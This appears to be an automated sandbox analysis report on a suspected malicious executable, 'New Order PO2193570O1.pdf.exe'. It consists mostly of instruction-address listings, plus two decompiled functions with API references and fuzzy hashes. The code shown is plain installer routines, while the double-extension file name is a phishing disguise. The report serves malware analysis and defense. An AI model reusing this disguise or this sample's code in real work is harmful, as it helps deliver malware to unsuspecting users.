                                                                                                                              0x004067d5
                                                                                                                              0x004067e0
                                                                                                                              0x004067e2
                                                                                                                              0x004067b4
                                                                                                                              0x004067b4
                                                                                                                              0x004067c3
                                                                                                                              0x004067c7
                                                                                                                              0x004067c7
                                                                                                                              0x004067ec
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406131
                                                                                                                              0x00406133
                                                                                                                              0x00406136
                                                                                                                              0x004061a7
                                                                                                                              0x004061aa
                                                                                                                              0x004061ad
                                                                                                                              0x004061b4
                                                                                                                              0x004061be
                                                                                                                              0x0040679d
                                                                                                                              0x0040679d
                                                                                                                              0x00000000
                                                                                                                              0x0040679d
                                                                                                                              0x0040679d
                                                                                                                              0x00406138
                                                                                                                              0x0040613c
                                                                                                                              0x0040613f
                                                                                                                              0x00406141
                                                                                                                              0x00406144
                                                                                                                              0x00406147
                                                                                                                              0x00406149
                                                                                                                              0x0040614c
                                                                                                                              0x0040614e
                                                                                                                              0x00406153
                                                                                                                              0x00406156
                                                                                                                              0x00406159
                                                                                                                              0x0040615d
                                                                                                                              0x00406164
                                                                                                                              0x00406167
                                                                                                                              0x0040616e
                                                                                                                              0x00406172
                                                                                                                              0x0040617a
                                                                                                                              0x0040617a
                                                                                                                              0x0040617a
                                                                                                                              0x00406174
                                                                                                                              0x00406174
                                                                                                                              0x00406174
                                                                                                                              0x00406169
                                                                                                                              0x00406169
                                                                                                                              0x00406169
                                                                                                                              0x0040617e
                                                                                                                              0x00406181
                                                                                                                              0x0040619f
                                                                                                                              0x004061a1
                                                                                                                              0x00000000
                                                                                                                              0x00406183
                                                                                                                              0x00406183
                                                                                                                              0x00406186
                                                                                                                              0x00406189
                                                                                                                              0x0040618c
                                                                                                                              0x0040618e
                                                                                                                              0x0040618e
                                                                                                                              0x0040618e
                                                                                                                              0x00406191
                                                                                                                              0x00406194
                                                                                                                              0x00406196
                                                                                                                              0x00406197
                                                                                                                              0x0040619a
                                                                                                                              0x00000000
                                                                                                                              0x0040619a
                                                                                                                              0x00000000
                                                                                                                              0x004063d0
                                                                                                                              0x004063d4
                                                                                                                              0x004063f2
                                                                                                                              0x004063f5
                                                                                                                              0x004063fc
                                                                                                                              0x004063ff
                                                                                                                              0x00406402
                                                                                                                              0x00406405
                                                                                                                              0x00406408
                                                                                                                              0x0040640b
                                                                                                                              0x0040640d
                                                                                                                              0x00406414
                                                                                                                              0x00406415
                                                                                                                              0x00406417
                                                                                                                              0x0040641a
                                                                                                                              0x0040641d
                                                                                                                              0x00406420
                                                                                                                              0x00406420
                                                                                                                              0x00406425
                                                                                                                              0x00000000
                                                                                                                              0x00406425
                                                                                                                              0x004063d6
                                                                                                                              0x004063d9
                                                                                                                              0x004063dc
                                                                                                                              0x004063e6
                                                                                                                              0x0040679d
                                                                                                                              0x0040679d
                                                                                                                              0x00000000
                                                                                                                              0x0040679d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040647d
                                                                                                                              0x00406481
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406487
                                                                                                                              0x0040648b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406491
                                                                                                                              0x00406493
                                                                                                                              0x00406497
                                                                                                                              0x00406497
                                                                                                                              0x0040649a
                                                                                                                              0x0040649e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004064ee
                                                                                                                              0x004064f2
                                                                                                                              0x004064f9
                                                                                                                              0x004064fc
                                                                                                                              0x004064ff
                                                                                                                              0x00406509
                                                                                                                              0x0040679d
                                                                                                                              0x0040679d
                                                                                                                              0x00000000
                                                                                                                              0x0040679d
                                                                                                                              0x0040679d
                                                                                                                              0x004064f4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406515
                                                                                                                              0x00406519
                                                                                                                              0x00406520
                                                                                                                              0x00406523
                                                                                                                              0x00406526
                                                                                                                              0x0040651b
                                                                                                                              0x0040651b
                                                                                                                              0x0040651b
                                                                                                                              0x00406529
                                                                                                                              0x0040652c
                                                                                                                              0x0040652f
                                                                                                                              0x0040652f
                                                                                                                              0x00406532
                                                                                                                              0x00406535
                                                                                                                              0x00406538
                                                                                                                              0x00406538
                                                                                                                              0x0040653b
                                                                                                                              0x00406542
                                                                                                                              0x00406547
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004065d5
                                                                                                                              0x004065d5
                                                                                                                              0x004065d9
                                                                                                                              0x00406977
                                                                                                                              0x00000000
                                                                                                                              0x00406977
                                                                                                                              0x004065df
                                                                                                                              0x004065e2
                                                                                                                              0x004065e5
                                                                                                                              0x004065e9
                                                                                                                              0x004065ec
                                                                                                                              0x004065f2
                                                                                                                              0x004065f4
                                                                                                                              0x004065f4
                                                                                                                              0x004065f4
                                                                                                                              0x004065f7
                                                                                                                              0x004065fa
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004061ca
                                                                                                                              0x004061ca
                                                                                                                              0x004061ce
                                                                                                                              0x0040693b
                                                                                                                              0x00000000
                                                                                                                              0x0040693b
                                                                                                                              0x004061d4
                                                                                                                              0x004061d7
                                                                                                                              0x004061da
                                                                                                                              0x004061de
                                                                                                                              0x004061e1
                                                                                                                              0x004061e7
                                                                                                                              0x004061e9
                                                                                                                              0x004061e9
                                                                                                                              0x004061e9
                                                                                                                              0x004061ec
                                                                                                                              0x004061ef
                                                                                                                              0x004061ef
                                                                                                                              0x004061f2
                                                                                                                              0x004061f5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004061fb
                                                                                                                              0x00406201
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406207
                                                                                                                              0x00406207
                                                                                                                              0x0040620b
                                                                                                                              0x0040620e
                                                                                                                              0x00406211
                                                                                                                              0x00406214
                                                                                                                              0x00406217
                                                                                                                              0x00406218
                                                                                                                              0x0040621b
                                                                                                                              0x0040621d
                                                                                                                              0x00406223
                                                                                                                              0x00406226
                                                                                                                              0x00406229
                                                                                                                              0x0040622c
                                                                                                                              0x0040622f
                                                                                                                              0x00406232
                                                                                                                              0x00406235
                                                                                                                              0x00406251
                                                                                                                              0x00406254
                                                                                                                              0x00406257
                                                                                                                              0x0040625a
                                                                                                                              0x00406261
                                                                                                                              0x00406265
                                                                                                                              0x00406267
                                                                                                                              0x0040626b
                                                                                                                              0x00406237
                                                                                                                              0x00406237
                                                                                                                              0x0040623b
                                                                                                                              0x00406243
                                                                                                                              0x00406248
                                                                                                                              0x0040624a
                                                                                                                              0x0040624c
                                                                                                                              0x0040624c
                                                                                                                              0x0040626e
                                                                                                                              0x00406275
                                                                                                                              0x00406278
                                                                                                                              0x00000000
                                                                                                                              0x0040627e
                                                                                                                              0x00000000
                                                                                                                              0x0040627e
                                                                                                                              0x00000000
                                                                                                                              0x00406283
                                                                                                                              0x00406283
                                                                                                                              0x00406287
                                                                                                                              0x00406947
                                                                                                                              0x00000000
                                                                                                                              0x00406947
                                                                                                                              0x0040628d
                                                                                                                              0x00406290
                                                                                                                              0x00406293
                                                                                                                              0x00406297
                                                                                                                              0x0040629a
                                                                                                                              0x004062a0
                                                                                                                              0x004062a2
                                                                                                                              0x004062a2
                                                                                                                              0x004062a2
                                                                                                                              0x004062a5
                                                                                                                              0x004062a8
                                                                                                                              0x004062a8
                                                                                                                              0x004062a8
                                                                                                                              0x004062ae
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004062b0
                                                                                                                              0x004062b3
                                                                                                                              0x004062b6
                                                                                                                              0x004062b9
                                                                                                                              0x004062bc
                                                                                                                              0x004062bf
                                                                                                                              0x004062c2
                                                                                                                              0x004062c5
                                                                                                                              0x004062c8
                                                                                                                              0x004062cb
                                                                                                                              0x004062ce
                                                                                                                              0x004062e6
                                                                                                                              0x004062e9
                                                                                                                              0x004062ec
                                                                                                                              0x004062ef
                                                                                                                              0x004062ef
                                                                                                                              0x004062f2
                                                                                                                              0x004062f6
                                                                                                                              0x004062f8
                                                                                                                              0x004062d0
                                                                                                                              0x004062d0
                                                                                                                              0x004062d8
                                                                                                                              0x004062dd
                                                                                                                              0x004062df
                                                                                                                              0x004062e1
                                                                                                                              0x004062e1
                                                                                                                              0x004062fb
                                                                                                                              0x00406302
                                                                                                                              0x00406305
                                                                                                                              0x00000000
                                                                                                                              0x00406307
                                                                                                                              0x00000000
                                                                                                                              0x00406307
                                                                                                                              0x00406305
                                                                                                                              0x0040630c
                                                                                                                              0x0040630c
                                                                                                                              0x0040630c
                                                                                                                              0x0040630c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406347
                                                                                                                              0x00406347
                                                                                                                              0x0040634b
                                                                                                                              0x00406953
                                                                                                                              0x00000000
                                                                                                                              0x00406953
                                                                                                                              0x00406351
                                                                                                                              0x00406354
                                                                                                                              0x00406357
                                                                                                                              0x0040635b
                                                                                                                              0x0040635e
                                                                                                                              0x00406364
                                                                                                                              0x00406366
                                                                                                                              0x00406366
                                                                                                                              0x00406366
                                                                                                                              0x00406369
                                                                                                                              0x0040636c
                                                                                                                              0x0040636c
                                                                                                                              0x00406372
                                                                                                                              0x00406310
                                                                                                                              0x00406310
                                                                                                                              0x00406313
                                                                                                                              0x00000000
                                                                                                                              0x00406313
                                                                                                                              0x00406374
                                                                                                                              0x00406374
                                                                                                                              0x00406377
                                                                                                                              0x0040637a
                                                                                                                              0x0040637d
                                                                                                                              0x00406380
                                                                                                                              0x00406383
                                                                                                                              0x00406386
                                                                                                                              0x00406389
                                                                                                                              0x0040638c
                                                                                                                              0x0040638f
                                                                                                                              0x00406392
                                                                                                                              0x004063aa
                                                                                                                              0x004063ad
                                                                                                                              0x004063b0
                                                                                                                              0x004063b3
                                                                                                                              0x004063b3
                                                                                                                              0x004063b6
                                                                                                                              0x004063ba
                                                                                                                              0x004063bc
                                                                                                                              0x00406394
                                                                                                                              0x00406394
                                                                                                                              0x0040639c
                                                                                                                              0x004063a1
                                                                                                                              0x004063a3
                                                                                                                              0x004063a5
                                                                                                                              0x004063a5
                                                                                                                              0x004063bf
                                                                                                                              0x004063c6
                                                                                                                              0x004063c9
                                                                                                                              0x00000000
                                                                                                                              0x004063cb
                                                                                                                              0x00000000
                                                                                                                              0x004063cb
                                                                                                                              0x00000000
                                                                                                                              0x00406658
                                                                                                                              0x00406658
                                                                                                                              0x0040665c
                                                                                                                              0x00406983
                                                                                                                              0x00000000
                                                                                                                              0x00406983
                                                                                                                              0x00406662
                                                                                                                              0x00406665
                                                                                                                              0x00406668
                                                                                                                              0x0040666c
                                                                                                                              0x0040666f
                                                                                                                              0x00406675
                                                                                                                              0x00406677
                                                                                                                              0x00406677
                                                                                                                              0x00406677
                                                                                                                              0x0040667a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406428
                                                                                                                              0x00406428
                                                                                                                              0x0040642b
                                                                                                                              0x0040679d
                                                                                                                              0x0040679d
                                                                                                                              0x00000000
                                                                                                                              0x0040679d
                                                                                                                              0x00000000
                                                                                                                              0x00406767
                                                                                                                              0x0040676b
                                                                                                                              0x0040678d
                                                                                                                              0x00406790
                                                                                                                              0x0040679a
                                                                                                                              0x0040679d
                                                                                                                              0x0040679d
                                                                                                                              0x00000000
                                                                                                                              0x0040679d
                                                                                                                              0x0040679d
                                                                                                                              0x0040676d
                                                                                                                              0x00406770
                                                                                                                              0x00406774
                                                                                                                              0x00406777
                                                                                                                              0x00406777
                                                                                                                              0x0040677a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406824
                                                                                                                              0x00406828
                                                                                                                              0x00406846
                                                                                                                              0x00406846
                                                                                                                              0x00406846
                                                                                                                              0x0040684d
                                                                                                                              0x00406854
                                                                                                                              0x0040685b
                                                                                                                              0x0040685b
                                                                                                                              0x00000000
                                                                                                                              0x0040685b
                                                                                                                              0x0040682a
                                                                                                                              0x0040682d
                                                                                                                              0x00406830
                                                                                                                              0x00406833
                                                                                                                              0x0040683a
                                                                                                                              0x0040677e
                                                                                                                              0x0040677e
                                                                                                                              0x00406781
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406915
                                                                                                                              0x00406918
                                                                                                                              0x00406819
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040654f
                                                                                                                              0x00406551
                                                                                                                              0x00406558
                                                                                                                              0x00406559
                                                                                                                              0x0040655b
                                                                                                                              0x0040655e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406566
                                                                                                                              0x00406569
                                                                                                                              0x0040656c
                                                                                                                              0x0040656e
                                                                                                                              0x00406570
                                                                                                                              0x00406570
                                                                                                                              0x00406571
                                                                                                                              0x00406574
                                                                                                                              0x0040657b
                                                                                                                              0x0040657e
                                                                                                                              0x0040658c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406862
                                                                                                                              0x00406862
                                                                                                                              0x00406865
                                                                                                                              0x0040686c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406871
                                                                                                                              0x00406871
                                                                                                                              0x00406875
                                                                                                                              0x004069ad
                                                                                                                              0x00000000
                                                                                                                              0x004069ad
                                                                                                                              0x0040687b
                                                                                                                              0x0040687e
                                                                                                                              0x00406881
                                                                                                                              0x00406885
                                                                                                                              0x00406888
                                                                                                                              0x0040688e
                                                                                                                              0x00406890
                                                                                                                              0x00406890
                                                                                                                              0x00406890
                                                                                                                              0x00406893
                                                                                                                              0x00406896
                                                                                                                              0x00406896
                                                                                                                              0x00406896
                                                                                                                              0x00406896
                                                                                                                              0x00406899
                                                                                                                              0x00406899
                                                                                                                              0x0040689d
                                                                                                                              0x004068fd
                                                                                                                              0x00406900
                                                                                                                              0x00406905
                                                                                                                              0x00406906
                                                                                                                              0x00406908
                                                                                                                              0x0040690a
                                                                                                                              0x0040690d
                                                                                                                              0x00406819
                                                                                                                              0x00406819
                                                                                                                              0x00000000
                                                                                                                              0x0040681f
                                                                                                                              0x00406819
                                                                                                                              0x0040689f
                                                                                                                              0x004068a5
                                                                                                                              0x004068a8
                                                                                                                              0x004068ab
                                                                                                                              0x004068ae
                                                                                                                              0x004068b1
                                                                                                                              0x004068b4
                                                                                                                              0x004068b7
                                                                                                                              0x004068ba
                                                                                                                              0x004068bd
                                                                                                                              0x004068c0
                                                                                                                              0x004068d9
                                                                                                                              0x004068dc
                                                                                                                              0x004068df
                                                                                                                              0x004068e2
                                                                                                                              0x004068e6
                                                                                                                              0x004068e8
                                                                                                                              0x004068e8
                                                                                                                              0x004068e9
                                                                                                                              0x004068ec
                                                                                                                              0x004068c2
                                                                                                                              0x004068c2
                                                                                                                              0x004068ca
                                                                                                                              0x004068cf
                                                                                                                              0x004068d1
                                                                                                                              0x004068d4
                                                                                                                              0x004068d4
                                                                                                                              0x004068ef
                                                                                                                              0x004068f6
                                                                                                                              0x00000000
                                                                                                                              0x004068f8
                                                                                                                              0x00000000
                                                                                                                              0x004068f8
                                                                                                                              0x00000000
                                                                                                                              0x00406594
                                                                                                                              0x00406597
                                                                                                                              0x004065cd
                                                                                                                              0x004066fd
                                                                                                                              0x004066fd
                                                                                                                              0x004066fd
                                                                                                                              0x004066fd
                                                                                                                              0x00406700
                                                                                                                              0x00406700
                                                                                                                              0x00406703
                                                                                                                              0x00406705
                                                                                                                              0x0040698f
                                                                                                                              0x00000000
                                                                                                                              0x0040698f
                                                                                                                              0x0040670b
                                                                                                                              0x0040670e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406714
                                                                                                                              0x00406718
                                                                                                                              0x0040671b
                                                                                                                              0x0040671b
                                                                                                                              0x0040671b
                                                                                                                              0x00000000
                                                                                                                              0x0040671b
                                                                                                                              0x00406599
                                                                                                                              0x0040659b
                                                                                                                              0x0040659d
                                                                                                                              0x0040659f
                                                                                                                              0x004065a2
                                                                                                                              0x004065a3
                                                                                                                              0x004065a5
                                                                                                                              0x004065a7
                                                                                                                              0x004065aa
                                                                                                                              0x004065ad
                                                                                                                              0x004065c3
                                                                                                                              0x004065c8
                                                                                                                              0x00406600
                                                                                                                              0x00406600
                                                                                                                              0x00406604
                                                                                                                              0x00406630
                                                                                                                              0x00406632
                                                                                                                              0x00406639
                                                                                                                              0x0040663c
                                                                                                                              0x0040663f
                                                                                                                              0x0040663f
                                                                                                                              0x00406644
                                                                                                                              0x00406644
                                                                                                                              0x00406646
                                                                                                                              0x00406649
                                                                                                                              0x00406650
                                                                                                                              0x00406653
                                                                                                                              0x00406680
                                                                                                                              0x00406680
                                                                                                                              0x00406683
                                                                                                                              0x00406686
                                                                                                                              0x004066fa
                                                                                                                              0x004066fa
                                                                                                                              0x004066fa
                                                                                                                              0x00000000
                                                                                                                              0x004066fa
                                                                                                                              0x00406688
                                                                                                                              0x0040668e
                                                                                                                              0x00406691
                                                                                                                              0x00406694
                                                                                                                              0x00406697
                                                                                                                              0x0040669a
                                                                                                                              0x0040669d
                                                                                                                              0x004066a0
                                                                                                                              0x004066a3
                                                                                                                              0x004066a6
                                                                                                                              0x004066a9
                                                                                                                              0x004066c2
                                                                                                                              0x004066c4
                                                                                                                              0x004066c7
                                                                                                                              0x004066c8
                                                                                                                              0x004066cb
                                                                                                                              0x004066cd
                                                                                                                              0x004066d0
                                                                                                                              0x004066d2
                                                                                                                              0x004066d4
                                                                                                                              0x004066d7
                                                                                                                              0x004066d9
                                                                                                                              0x004066dc
                                                                                                                              0x004066e0
                                                                                                                              0x004066e2
                                                                                                                              0x004066e2
                                                                                                                              0x004066e3
                                                                                                                              0x004066e6
                                                                                                                              0x004066e9
                                                                                                                              0x004066ab
                                                                                                                              0x004066ab
                                                                                                                              0x004066b3
                                                                                                                              0x004066b8
                                                                                                                              0x004066ba
                                                                                                                              0x004066bd
                                                                                                                              0x004066bd
                                                                                                                              0x004066ec
                                                                                                                              0x004066f3
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x00000000
                                                                                                                              0x004066f5
                                                                                                                              0x00000000
                                                                                                                              0x004066f5
                                                                                                                              0x004066f3
                                                                                                                              0x00406606
                                                                                                                              0x00406609
                                                                                                                              0x0040660b
                                                                                                                              0x0040660e
                                                                                                                              0x00406611
                                                                                                                              0x00406614
                                                                                                                              0x00406616
                                                                                                                              0x00406619
                                                                                                                              0x0040661c
                                                                                                                              0x0040661c
                                                                                                                              0x0040661f
                                                                                                                              0x0040661f
                                                                                                                              0x00406622
                                                                                                                              0x00406629
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x00000000
                                                                                                                              0x0040662b
                                                                                                                              0x00000000
                                                                                                                              0x0040662b
                                                                                                                              0x00406629
                                                                                                                              0x004065af
                                                                                                                              0x004065b2
                                                                                                                              0x004065b4
                                                                                                                              0x004065b7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406316
                                                                                                                              0x00406316
                                                                                                                              0x0040631a
                                                                                                                              0x0040695f
                                                                                                                              0x00000000
                                                                                                                              0x0040695f
                                                                                                                              0x00406320
                                                                                                                              0x00406323
                                                                                                                              0x00406326
                                                                                                                              0x00406329
                                                                                                                              0x0040632c
                                                                                                                              0x0040632f
                                                                                                                              0x00406332
                                                                                                                              0x00406334
                                                                                                                              0x00406337
                                                                                                                              0x0040633a
                                                                                                                              0x0040633d
                                                                                                                              0x0040633f
                                                                                                                              0x0040633f
                                                                                                                              0x0040633f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004064a1
                                                                                                                              0x004064a1
                                                                                                                              0x004064a5
                                                                                                                              0x0040696b
                                                                                                                              0x00000000
                                                                                                                              0x0040696b
                                                                                                                              0x004064ab
                                                                                                                              0x004064ae
                                                                                                                              0x004064b1
                                                                                                                              0x004064b4
                                                                                                                              0x004064b6
                                                                                                                              0x004064b6
                                                                                                                              0x004064b6
                                                                                                                              0x004064b9
                                                                                                                              0x004064bc
                                                                                                                              0x004064bf
                                                                                                                              0x004064c2
                                                                                                                              0x004064c5
                                                                                                                              0x004064c8
                                                                                                                              0x004064c9
                                                                                                                              0x004064cb
                                                                                                                              0x004064cb
                                                                                                                              0x004064cb
                                                                                                                              0x004064ce
                                                                                                                              0x004064d1
                                                                                                                              0x004064d4
                                                                                                                              0x004064d7
                                                                                                                              0x004064d7
                                                                                                                              0x004064d7
                                                                                                                              0x004064da
                                                                                                                              0x004064dc
                                                                                                                              0x004064dc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040671e
                                                                                                                              0x0040671e
                                                                                                                              0x0040671e
                                                                                                                              0x00406722
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406728
                                                                                                                              0x0040672b
                                                                                                                              0x0040672e
                                                                                                                              0x00406731
                                                                                                                              0x00406733
                                                                                                                              0x00406733
                                                                                                                              0x00406733
                                                                                                                              0x00406736
                                                                                                                              0x00406739
                                                                                                                              0x0040673c
                                                                                                                              0x0040673f
                                                                                                                              0x00406742
                                                                                                                              0x00406745
                                                                                                                              0x00406746
                                                                                                                              0x00406748
                                                                                                                              0x00406748
                                                                                                                              0x00406748
                                                                                                                              0x0040674b
                                                                                                                              0x0040674e
                                                                                                                              0x00406751
                                                                                                                              0x00406754
                                                                                                                              0x00406757
                                                                                                                              0x0040675b
                                                                                                                              0x0040675d
                                                                                                                              0x00406760
                                                                                                                              0x00000000
                                                                                                                              0x00406762
                                                                                                                              0x004064df
                                                                                                                              0x004064df
                                                                                                                              0x00000000
                                                                                                                              0x004064df
                                                                                                                              0x00406760
                                                                                                                              0x00406995
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405fc4
                                                                                                                              0x004069cc
                                                                                                                              0x004069cc
                                                                                                                              0x00000000
                                                                                                                              0x004069cc
                                                                                                                              0x00406819
                                                                                                                              0x004067a0
                                                                                                                              0x0040679d

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
                                                                                                                              • Instruction ID: fa01dbb36adddbb747bc37ce8d7c8691094d52a97b4972d7f98645f49a39bfe1
                                                                                                                              • Opcode Fuzzy Hash: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
                                                                                                                              • Instruction Fuzzy Hash: B3715671D00229CBEF28CF98C844BADBBB1FF44305F11816AD856BB281C7795A56DF54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 69%
                                                                                                                              			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x423ed0; // 0x55fbc4
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}












                                                                                                                              0x0040138a
                                                                                                                              0x004013fa
                                                                                                                              0x00401392
                                                                                                                              0x0040139b
                                                                                                                              0x004013a0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004013a2
                                                                                                                              0x004013a3
                                                                                                                              0x004013ad
                                                                                                                              0x00000000
                                                                                                                              0x00401404
                                                                                                                              0x004013b0
                                                                                                                              0x004013b7
                                                                                                                              0x004013bd
                                                                                                                              0x004013be
                                                                                                                              0x004013c0
                                                                                                                              0x004013c2
                                                                                                                              0x004013b9
                                                                                                                              0x004013b9
                                                                                                                              0x004013ba
                                                                                                                              0x004013ba
                                                                                                                              0x004013c9
                                                                                                                              0x004013cb
                                                                                                                              0x004013f4
                                                                                                                              0x004013f4
                                                                                                                              0x004013c9
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                              • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3850602802-0
                                                                                                                              • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                                                                                                              • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                                                                                                                              • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                                                                                                              • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040583D, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 68%
                                                                                                                              			E0040583D(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                                              0x00405841
                                                                                                                              0x0040584e
                                                                                                                              0x00405863
                                                                                                                              0x00405869

                                                                                                                              APIs
                                                                                                                              • GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe,80000000,00000003), ref: 00405841
                                                                                                                              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
